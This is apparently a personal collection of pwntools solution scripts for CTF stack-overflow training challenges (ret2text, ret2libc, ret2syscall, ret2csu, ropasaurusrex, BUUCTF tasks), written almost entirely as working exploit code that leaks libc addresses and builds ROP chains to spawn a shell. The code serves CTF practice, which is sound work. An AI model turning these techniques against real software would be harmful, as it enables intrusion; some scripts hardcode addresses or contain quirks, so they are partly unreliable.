Pwn–stack_overflow

题目来源于:蒸米pwn/ctf-wiki

蒸米pwn

level1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/python
# -*- coding:utf-8 -*-
from pwn import *
debug = True
context.log_level = 'debug'
context.arch = "i386"
context.terminal = ['/bin/zsh']
sh = process('./level1')
ret_addr=0xffffd580
gdb.attach(sh, "b vulnerable_function")
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(140,'a')+p32(ret_addr)
sh.sendline(payload)
sh.interactive()

level2

法一:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

sh = process('./level2')

offset = 140

sys_addr = 0xf7e4eda0

str_addr = 0xf7f6fa0b

payload = 'a'*offset + p32(sys_addr) + p32(0x123) + p32(str_addr)

sh.sendline(payload)
sh.interactive()

法二:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# -*- coding: UTF-8 -*-
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x0804843B
out_color = '\033[1;32m'
def leak():
print(out_color+"======start leak write address======")
global write_addr
elf = ELF('./level2')
write_plt = elf.symbols['write']
write_got = elf.got['write']
print(out_color+"write_plt = "+hex(write_plt))
print("write_got = "+hex(write_got))
payload1 = 'a' * 140 + p32(write_plt) + p32(vuln_addr) + p32(1) + p32(write_got) + p32(4)
sh.send(payload1)
write_addr = u32(sh.recv(4))
print(out_color+"write_addr = "+hex(write_addr))

def pwn():
print("======start pwn it======")
libc = ELF('./libc.so')
lib_base_addr = write_addr - libc.symbols['write']
sys_addr = lib_base_addr + libc.symbols['system']
bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
print(out_color+"sys_addr = "+hex(sys_addr))
print("bin_addr = "+hex(bin_addr))
payload2 = 'a' * 140 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
sh.send(payload2)
sh.interactive()

def debug(debug):
global sh
if(debug == 1):
sh = process('./level2')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
debug(1)
leak()
pwn()

法三:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# -*- coding: UTF-8 -*-
from pwn import *
from LibcSearcher import *
#we don't konw libc
sh = 0
vuln_addr = 0x0804843B
out_color = '\033[1;32m'
def leak():
print(out_color+"======start leak write address======")
global write_addr
elf = ELF('./level2')
write_plt = elf.symbols['write']
write_got = elf.got['write']
print(out_color+"write_plt = "+hex(write_plt))
print("write_got = "+hex(write_got))
payload1 = 'a' * 140 + p32(write_plt) + p32(vuln_addr) + p32(1) + p32(write_got) + p32(4)
sh.send(payload1)
write_addr = u32(sh.recv(4))
print(out_color+"write_addr = "+hex(write_addr))

def pwn():
print("======start pwn it======")
libc = LibcSearcher("write",write_addr)
lib_base_addr = write_addr - libc.dump("write")
sys_addr = lib_base_addr + libc.dump("system")
bin_addr = lib_base_addr + libc.dump("str_bin_sh")
print(out_color+"sys_addr = "+hex(sys_addr))
print("bin_addr = "+hex(bin_addr))
payload2 = 'a' * 140 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
sh.send(payload2)
sh.interactive()

def debug(debug):
global sh
if(debug == 1):
sh = process('./level2')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
debug(1)
leak()
pwn()

level3

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *

sh = process('./level3')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
sys_addr = 0x000000000040057B
ret = 0x000000000040044e
payload = 'a'*136 + p64(ret)+p64(ret)+p64(sys_addr)
sh.sendline(payload)
sh.interactive()

level4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *

sh = 0

def getAddr():
global sys_addr
global str_bin_addr
global pop_rdi_addr
global ret_addr
sys_addr = int(sh.recv(14),16)
print("sys_addr = " + hex(sys_addr))
libc = ELF('./libc.so')
libc_base_addr = sys_addr - libc.symbols['system']
str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
pop_rdi_addr = libc_base_addr + 0x000000000002155f
ret_addr = libc_base_addr + 0x00000000000008aa
print("libc_base_addr = " + hex(libc_base_addr))
print("str_bin_addr = " + hex(str_bin_addr))
print("pop_rdi_addr = " + hex(pop_rdi_addr))
print("ret_addr = " + hex(ret_addr))

def pwn():
print("======start pwn it======")
payload = 'a' * 136 + p64(pop_rdi_addr) + p64(str_bin_addr) + p64(ret_addr) + p64(sys_addr)
sh.sendlineafter("Hello, World",payload)
sh.interactive()

def debug(debug):
global sh
if(debug == 1):
sh = process('./level4')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote(ip,port)
debug(1)
getAddr()
pwn()

level5(ret2csu_init)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *

sh = 0
main_addr = 0x0000000000400559

def csu_gadget():
print('========gadget start=======')
global write_addr
elf = ELF('./level5')

# write_plt = elf.plt['write']
# write_plt = 0x400430
write_got = elf.got['write']
# print('write_plt = ' + hex(write_plt))
print('write_got = ' + hex(write_got))
gadget1_addr = 0x00000000004005E6
gadget2_addr = 0x00000000004005D0
payload1 = 'a' * 136 + p64(gadget1_addr) + p64(0) + p64(0) + p64(1) + p64(write_got) + p64(1) + p64(write_got) + p64(8) + p64(gadget2_addr) + 'b'*56 + p64(main_addr)
sh.recvuntil("Hello, World\n")
sh.send(payload1)
write_addr = u64(sh.recv(8))
print('write_addr = '+hex(write_addr))

def pwn():
print('========pwn start========')
libc = ELF('./libc.so')
libc_base_addr = write_addr - libc.symbols['write']
print("libc_base_addr = " + hex(libc_base_addr))
sys_addr = libc_base_addr + libc.symbols['system']
print("sys_addr = " + hex(sys_addr))
str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
print("str_bin_addr = " + hex(str_bin_addr))
pop_rdi_addr = libc_base_addr + 0x000000000002155f
ret_addr = libc_base_addr + 0x00000000000008aa
payload2 = 'a' * 136 + p64(pop_rdi_addr) + p64(str_bin_addr) + p64(ret_addr) + p64(sys_addr)
# sh.recvuntil("Hello, World\n")
sh.send(payload2)
sh.interactive()

def debug(debug):
global sh
if(debug == 1):
sh = process('./level5')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote('','')

debug(1)
csu_gadget()
pwn()

ret2csu_init(ctf-wiki)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *

sh = 0
offset = 136
vuln_main = 0x0000000000400588
def csu_gadget():
elf = ELF('./level5-2')
global write_addr
write_got = elf.got['write']
print("write_plt = "+hex(write_got))
paylaod = flat(['a' * offset , 0x400616 , 0,0,1,write_got,8,write_got,1,0x400600,'a'*56,vuln_main])
sh.recvuntil('Hello, World\n')
sh.send(paylaod)
write_addr = u64(sh.recv(8))
print("write_addr = "+hex(write_addr))

def pwn():
libc = ELF('./libc.so')
libc_base_addr = write_addr - libc.symbols['write']
print("libc_base_addr = "+hex(libc_base_addr))
sys_addr = libc_base_addr + libc.symbols['system']
print('sys_addr = ' + hex(sys_addr))
str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
print('str_bin_addr = ' + hex(str_bin_addr))
pop_rdi_addr = libc_base_addr + 0x000000000002155f
ret_addr = libc_base_addr + 0x00000000000008aa
payload = flat(['a' * offset,pop_rdi_addr,str_bin_addr,ret_addr,sys_addr])
sh.recvline('Hello, World\n')
sh.send(payload)
sh.interactive()

def debug(debug):
global sh
if(debug == 1):
sh = process('./level5-2')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote('','')

debug(1)
csu_gadget()
pwn()

ctfwiki

ret2text

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# Method one
# from pwn import *

# p=process('./ret2text')

# sys_addr=0x8048490
# bin_addr=0x8048763

# payload='a'*112+p32(sys_addr)+p32(0x123)+p32(bin_addr)

# p.sendline(payload)

# p.interactive()

# Method two
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x08048648
out_color = '\033[1;32m'
def leak():
print(out_color+"======start leak puts address======")
global puts_addr
elf = ELF('./ret2text')
puts_plt = elf.symbols['puts']
puts_got = elf.got['puts']
print(out_color+"puts_plt = "+hex(puts_plt))
print("puts_got = "+hex(puts_got))
payload1 = 'a' * 112 + p32(puts_plt) + p32(vuln_addr) + p32(puts_got)
sh.recvuntil("There is something amazing here, do you know anything?\n")
sh.sendline(payload1)
puts_addr = 0xf7e73ca0
# puts_addr = sh.recv(13)[-4:]
# str1 = ''
# for item in puts_addr:
# global str1
# str1 += item
# puts_addr = u32(str1)
print(out_color+"puts_addr = "+hex(puts_addr))

def pwn():
print("======start pwn it======")
libc = ELF('./challenge-yuque/libc.so')
lib_base_addr = puts_addr - libc.symbols['puts']
sys_addr = lib_base_addr + libc.symbols['system']
bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
print(out_color+"sys_addr = "+hex(sys_addr))
print("bin_addr = "+hex(bin_addr))
payload2 = 'a' * 104 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
sh.sendline(payload2)
sh.interactive()

def debug(debug):
global sh
if(debug == 1):
sh = process('./ret2text')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
debug(1)
leak()
pwn()

ret2shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# Method one
# from pwn import *
# sh = process('./ret2shellcode')

# context.arch = 'i386'
# context.terminal = ['/bin/zsh']
# context.log_level = 'debug'
# # gdb.attach(sh,'')

# shellcode = asm(shellcraft.sh())
# payload = shellcode.ljust(112,'a') + p32(0x0804A080)

# sh.sendline(payload)
# sh.interactive()

# method two
# -*- coding: utf-8 -*-
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x0804852D
out_color = '\033[1;32m'
def leak():
print(out_color+"======start leak puts address======")
global puts_addr
elf = ELF('./ret2shellcode')
puts_plt = elf.symbols['puts']
puts_got = elf.got['puts']
print(out_color+"puts_plt = "+hex(puts_plt))
print("puts_got = "+hex(puts_got))
payload1 = 'a' * 112 + p32(puts_plt) + p32(vuln_addr) + p32(puts_got)
sh.recvuntil("No system for you this time !!!\n")
sh.sendline(payload1)
# puts_addr = 0xf7e73ca0
puts_addr = sh.recv(13)[-4:]
str1 = ''
for item in puts_addr:
global str1
str1 += item
puts_addr = u32(str1)
print(out_color+"puts_addr = "+hex(puts_addr))

def pwn():
print("======start pwn it======")
libc = ELF('./challenge-yuque/libc.so')
lib_base_addr = puts_addr - libc.symbols['puts']
sys_addr = lib_base_addr + libc.symbols['system']
bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
print(out_color+"sys_addr = "+hex(sys_addr))
print("bin_addr = "+hex(bin_addr))
payload2 = 'a' * 104 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
sh.sendline(payload2)
sh.interactive()

def debug(debug):
global sh
if(debug == 1):
sh = process('./ret2shellcode')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
debug(1)
leak()
pwn()

ret2syscall

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
#gadgets
#int 0x80 => eax = 0xb => sys_execv(bx,cx,dx..)
sh = process('./rop')
context.arch = 'i386'
context.terminal = ['/bin/sh']
context.log_level = 'debug'
# gdb.attach(sh,'')
pop_eax_addr = 0x080bb196
pop_ebx_ecx_edx_addr = 0x0806eb90
get_int_addr = 0x08049421
str_bin_sh_addr = 0x080be408

payload = flat(['a'*112,pop_eax_addr,0xb,pop_ebx_ecx_edx_addr,0,0,str_bin_sh_addr,get_int_addr])

sh.recvuntil("What do you plan to do?\n")
sh.sendline(payload)
sh.interactive()

stack_overflow

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# -*- coding: utf-8 -*-
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x08048454
out_color = '\033[1;32m'
def leak():
print(out_color+"======start leak puts address======")
global puts_addr
elf = ELF('./stack_overflow')
puts_plt = elf.symbols['puts']
puts_got = elf.got['puts']
print(out_color+"puts_plt = "+hex(puts_plt))
print("puts_got = "+hex(puts_got))
payload1 = 'a' * 24 + p32(puts_plt) + p32(vuln_addr) + p32(puts_got)
sh.sendline(payload1)
out_str = sh.recv(41)
str2 = ''
for item in out_str[-4:]:
global str2
str2 += str(item)
puts_addr = u32(str2)
print(out_color+"puts_addr = "+hex(puts_addr))

def pwn():
print("======start pwn it======")
libc = ELF('./challenge-yuque/libc.so')
lib_base_addr = puts_addr - libc.symbols['puts']
sys_addr = lib_base_addr + libc.symbols['system']
bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
print(out_color+"sys_addr = "+hex(sys_addr))
print("bin_addr = "+hex(bin_addr))
payload2 = 'a' * 24 + p32(sys_addr) + p32(0x123) + p32(bin_addr)
sh.sendline(payload2)
sh.interactive()

def debug(debug):
global sh
if(debug == 1):
sh = process('./stack_overflow')
context.arch = 'i386'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
debug(1)
leak()
pwn()

ret2libc1

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

sh = process('./ret2libc1')

sys_addr = 0x08048460
bin_addr = 0x08048720

payload = 'a' * 112 + p32(sys_addr) + p32(0x123) + p32(bin_addr)

sh.sendline(payload)
sh.interactive()

ret2libc2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *

sh = process('./ret2libc2')
context.arch = 'i386'
context.terminal = ['/bin/sh']
context.log_level = 'debug'
gdb.attach(sh,'')
gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx = 0x0804843d
buf2 = 0x804a080
payload = flat(
['a' * 112, gets_plt, pop_ebx, buf2, system_plt, 0xdeadbeef, buf2])
sh.sendline(payload)
sh.sendline('/bin/sh')
sh.interactive()

ret2libc3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# -*- coding: utf-8 -*-
from pwn import *
# libc.so given
sh = 0
vuln_addr = 0x08048618
out_color = '\033[1;32m'
def leak():
print(out_color+"======start leak puts address======")
global puts_addr
elf = ELF('./ret2libc3')
puts_plt = elf.symbols['puts']
puts_got = elf.got['puts']
print(out_color+"puts_plt = "+hex(puts_plt))
print("puts_got = "+hex(puts_got))
payload1 = 'a' * 112 + p32(puts_plt) + p32(vuln_addr) + p32(puts_got)
sh.sendlineafter('Can you find it !?',payload1)
puts_addr = u32(sh.recv(4))
# str2 = ''
# for item in out_str[-4:]:
# global str2
# str2 += str(item)
# puts_addr = u32(str2)
print(out_color+"puts_addr = "+hex(puts_addr))

def pwn():
print("======start pwn it======")
libc = ELF('./challenge-yuque/libc.so')
# sys_addr = puts_addr -(libc.symbols['puts'] - libc.symbols['system'])
# bin_addr = puts_addr -(libc.symbols['puts'] - next(libc.search('/bin/sh')))
lib_base_addr = puts_addr - libc.symbols['puts']
sys_addr = lib_base_addr + libc.symbols['system']
bin_addr = lib_base_addr + next(libc.search("/bin/sh"))
print(out_color+"sys_addr = "+hex(sys_addr))
print("bin_addr = "+hex(bin_addr))
# payload2 = 'a' * 104 + p32(sys_addr) + p32(0x1234) + p32(bin_addr)
payload2 = 'a'*104 + p32(sys_addr) + p32(0x1234) + p32(bin_addr)
sh.sendline(payload2)
sh.interactive()

def debug(debug):
global sh
if(debug == 1):
sh = process('./ret2libc3')
context.arch = 'i386'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
debug(1)
leak()
pwn()

2013-PlaidCTF-ropasaurusrex

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *

sh = 0
offset = 140
vuln_addr = 0x804841D
def leak():
global write_addr
elf = ELF('./ropasaurusrex')
write_plt = elf.plt['write']
print("write_plt = " + hex(write_plt))
write_got = elf.got['write']
print('write_got = ' + hex(write_got))
payload = 'a' * offset + p32(write_plt) + p32(vuln_addr) + p32(1) + p32(write_got) +p32(4)
sh.send(payload)
write_addr = u32(sh.recv(4))
print("write_addr = " + hex(write_addr))

def pwn():
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc_base_addr = write_addr - libc.symbols['write']
sys_addr = libc_base_addr + libc.symbols['system']
str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
paylaod = 'a' * offset + p32(sys_addr) + p32(0x123) + p32(str_bin_addr)
sh.send(paylaod)
sh.interactive()
def debug(debug):
global sh
if(debug == 1):
sh = process('./ropasaurusrex')
context.arch = 'i386'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote("127.0.0.1",1234)

if __name__ == "__main__":
debug(1)
leak()
pwn()

ciscn_2019_n_1(buu)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
from pwn import *

sh = 0
vuln_addr = 0x0000000000400676

def leak():
global puts_addr
elf = ELF('./ciscn_2019_n_1')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts'] + 4
print("puts_got = " + hex(puts_got))
print('puts_plt = ' + hex(puts_plt))
pop_rdi_addr = 0x0000000000400793
payload1 = 'a' * 56 + p64(pop_rdi_addr) + p64(puts_got) +p64(puts_plt)+p64(vuln_addr)
sh.recvuntil("Let's guess the number.")
sh.sendline(payload1)
# puts_addr = u64(sh.recv(8))
# print(sh.recv(8))
# puts_addr = 0x7ffff7a649c0
sh.recvuntil("Its value should be 11.28125")
# sh.recv(10)
puts_addr = u64(sh.recv(8))
puts_addr = hex(puts_addr)
puts_addr = str(puts_addr)
puts_addr = '0x'+puts_addr[3:15]
puts_addr = int(puts_addr,0)
# puts_addr = hex(puts_addr)
print("puts_addr = " + hex(puts_addr))

def pwn():
libc = ELF('./libc.so')
libc_base_addr = puts_addr - libc.symbols['puts']
print("libc_base_addr = "+hex(libc_base_addr))
sys_addr = libc_base_addr + libc.symbols['system']
print("sys_addr = " + hex(sys_addr))
str_bin_addr = libc_base_addr + next(libc.search('/bin/sh'))
print("str_bin_addr = " + hex(str_bin_addr))
ret_addr = libc_base_addr + 0x00000000000008aa
pop_rdi_addr = libc_base_addr + 0x000000000002155f
payload2 = 'a' * 56 + p64(pop_rdi_addr) + p64(str_bin_addr) + p64(ret_addr) +p64(sys_addr)
sh.sendline(payload2)
sh.interactive()


def debug(debug):
global sh
if(debug == 1):
sh = process('./ciscn_2019_n_1')
context.arch = 'amd64'
context.terminal = ['/bin/zsh']
context.log_level = 'debug'
# gdb.attach(sh,'')
else:
sh = remote('node3.buuoj.cn',29191)

if __name__ == "__main__":
debug(1)
leak()
pwn()

pwn1_sctf_2016(buu)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *

sh = 0
def debug(debug):
global sh
if(debug==1):
context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['/bin/zsh', 'splitw', '-h']
sh = process('./pwn1_sctf_2016')
gdb.attach(sh,'')
else:
sh = remote('node3.buuoj.cn',27821)

def pwn():

ret_addr = 0x08048F0D
payload = 'I'*21+'a'+p32(ret_addr)
# sh.recvuntil('Tell me something about yourself:')
sh.sendline(payload)
sh.interactive()

if __name__ == "__main__":
debug(1)
pwn()